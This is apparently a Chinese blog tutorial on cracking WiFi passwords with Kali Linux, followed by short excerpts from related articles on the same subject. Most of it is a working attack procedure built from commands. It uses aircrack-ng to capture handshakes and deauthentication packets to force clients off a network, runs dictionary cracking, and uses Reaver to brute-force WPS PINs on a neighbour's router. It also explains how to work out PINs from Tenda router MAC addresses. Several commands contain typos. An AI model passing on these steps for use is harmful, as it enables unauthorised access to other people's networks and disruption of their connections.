利用kali破解wifi密码

准备工具

1.笔记本

2.USB无线上网卡(必备)

3.kali系统

4.密码字典

第一种方法

暴力破解法

何为暴力破解呢,其实就是一个一个密码去试,直到正确的密码。

现在的wifi一般加密都是:

1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。

2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。

3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。

进入正题:

1. 第一步

进入kali在终端输入如下

airmon-ng

列出网卡信息

2. 第二步

输入:

airmon-ng start wlan0

开启网卡监控

可以使用ifconfig命令查看一下网卡信息:

ifconfig

可以看到网卡的名字已经变了

3. 第三步

airodump-ng wlan0mon

扫描wifi信号

这里我用自己家的wifi做实验

4. 第四步

上图可以看出

BSSID是50:3A:A0:33:B2:8C    信道(CH)是:2

输入:

 airodump-ng -w freedom -c 2 -–bssid  50:3A:A0:33:B2:8C wlan0mon –ignore-negative-one

抓去握手包

-c:指定信道

-w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字

--bssid:指定路由器的MAC

5. 第五步

再开一个终端输入命令:

 aireplay-ng – -deatu 10 -a 路由器MAC -c 客户机MAC wlan0mon – -ignore-negative-one

使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包

–deatu:指定发送反认证包的个数,也可以使用-0(阿利伯数字0)来指定反认证包的个数

-a:指定路由器的MAC

-c:指定客户机的MAC

6. 第六步

破解握手包

aircrack-ng -a -w dict freedom-*.cap 

-a1:指定WEP加密方式

-a2:指定WPA-PSk加密方式

dict:字典的名字

freedom-*.cap:握手包

这个就是我的wifi密码

破解完成,成功与否靠强大的字典和运气了。

第二种方法

1.第一步

Wash扫描开启WPS的网络

wash -i wlan0mon [-C]

小编周围没有开启WPS功能的wifi,就会出现上图那样,这咋办。。。

不要急,因为有些隐藏了起来,我们直接霸王硬上弓

用前面那个扫wifi的命令:

  airodump-ng wlan0mon

看见小编圈起来的MAC没有,选择一个PWR的值的绝对值小于70的wifi破解

2. 第二步

选择一个路由器

我在这选择的是名字为:FAST_F70E的wifi

就他了:E4:D3:32:7F:F7:0E  -45        2        0    0   6  54e. WPA2 CCMP   PSK  FAST_F70E

然后命令如下:

reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv

E4:D3:32:7F:F7:0E 这个mac根据路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E

如图上表示可以破解,开启了wps功能

出现上图这样,就表示不能破解换其他wifi破解吧孩子

这样就表示破解出来了

小知识:

如果密码被改了你知道他wifi的pin码就用如下命令:reaver-i mon0 -b MAC -p PIN

pin码有8位:所以就是10的8次方,要穷举1000000000次

这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。

有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。

比如这个:bssid :Tenda_579A18    mac :C8:3A:35:57:9A:18  通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!

破解时推荐这个命令:

reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv

因为–d9 –t9参数可以防止pin死路由器。

时间: 2024-08-04 18:19:08

利用kali破解wifi密码的相关文章

u盘启动cdlinux系统利用pin破解wifi密码 亲测成功

步骤: 先找一个U盘,格式化 FAT32 1.用UltraISO 把CDLinux ISO镜像写入U盘,写入类型HDD+. 2.打开BootICE选择"分区引导记录",选择grub4Dos(第二项),再"安装/配置",再点击确定即可. 3.解压grldr&grub.exe&menu.lst文件夹,复制grldr,grub.exe文件和menu.lst文件到U盘根目录.U盘启动CDLinux系统就制作好了. 4.修改系统启动顺序,选择U盘启动. 5.破

Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

Kali Linux使用Aircrack破解wifi密码(wpa/wpa2) 要求: 安装有KaliLinux的计算机 支持监控模式的网卡,笔记本电脑一般都支持 字典文件 时间和耐心 这种攻击需要字典文件,一个好的字典至关重要.我以Kali Linux自带的rockyou字典为例,位于/user/share/wordlists/rockyou.txt.gz. 使用前先解压: # gzip -d /usr/share/wordlists/rockyou.txt.gz 注意:破解其他人的wifi密码

Kali Linux下破解WIFI密码挂载usb无线网卡的方法

Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12    来源:服务器之家    投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还没有一个可以破解任意类型wifi密码的工具或者方案存在.虽然你可以在网络上找到大量的教程,教程中有大量的成功案例,但是在实际场景中成功率是极低的. 其次,免费的午餐并不都那么好吃,希望读者在自己的内网上进行测试,毕竟学习技术是第一位的.免费午餐有可能会增加你遭受钓鱼攻击的风险. 本系列文章会针对不同

Aircrack除破解WiFi密码外的趣味玩法

Aircrack这种屌爆了的攻击测试套件在网上居然只有用它破解WiFi密码的教程,在这里我来扒个冷门,介绍下这款杀器的其他一些有趣的玩法. 0×00:首先你需要一张usb无线网卡 ifconfig查看可以正常识别,如果不行看这里. 0×01:干坏或者不坏的事情前先修改MAC ifconfig [INTERFACE] down#关闭网卡 #[INTERFACE]是指你的无线网卡,一般为wlan0,下不再说明 macchanger -m [MAC] [INTERFACE]#修改MAC,[MAC]是你

真正的手机破解wifi密码,aircrack-ng,reaver,仅限mx2(BCM4330芯片)

仅限mx2(BCM4330芯片),mx可能有戏没测试(BCM4329?),mx3不行. PS:原生安卓应用,非虚拟机 reaver,不知道是啥的看这里http://tieba.baidu.com/p/2682878857 抓包破解wifi密码 下载地址: http://pan.baidu.com/s/19qQ3M 依次安装4个包,注意BusyBox安装完成之后需要打开再点一次安装,安装完四个包之后重启手机 打开bcmon,点安装,然后点启动监听模式,按home返回桌面,打开AircrackGUI

Mac系统安装Aircrack-ng破解wifi密码(2)

我们上一篇文章说过如何通过Aircrack-ng, 破解使用WPA/PSK加密方式的路由密码, 这一篇介绍的是使用Aircrack-ng破解使用WEP加密方式的路由密码: WEP和WPA/PSK的区别 WPA/PSK的加密方式相对于WEP的加密方式更加安全,WEP是一种老式的加密方式,在2003年时就被WPA加密所淘汰,由于其安全性能存在好几个弱点,很容易被专业人士攻破,不过,对于非专业人来说还是比较安全的.其次由于WEP采用的是IEEE 802.11技术,而现在无线路由设备基本都是使用的IEE

利用Cubieborad破解WiFi

http://blog.hibeiyu.com/archives/518 利用Cubieborad破解WiFi,布布扣,bubuko.com

Kali Linux WiFi密码破解

0x01 准备工具 1.Kali Linux 2.0 2.无线网卡(兼容Kali或已安装驱动) 3.字典 - http://www.qqtn.com/down/80787.html#szdz 0x02 方法一:Aircrack字典暴力破解 1.进入终端输入: airmon-ng  查看网卡信息 2.在终端内输入:airmon-ng start wlan0(网卡名称)  开启网卡混杂模式 然后输入iwconfig,查看网卡名称是否变为wlan0mon(这里我的网卡是wlan0,所以是wlan0mo

微信破解WiFi密码如何操作?一招帮你查看密码!

对用手机用户来说我们使用最多的软件莫过于腾讯的微信了!对于使用最为广泛的软件来说,如果能够帮助我们解决网络问题那无疑是最好的,因为有时你们破解wifi还要下载一大堆破解软件.现在直接通过微信就能破解WIFI了.而且还能查看破解密码. 下面小编就和你们讲解一下吧: 一.查看WiFi密码步骤 步骤/方法 1.依次点击:"发现"--"小程序" 2.小程序搜索"WiFi密码查看器官方版",这个是腾讯旗下的产业,小伙伴们可以放心使用哦! 3.看看小编自己破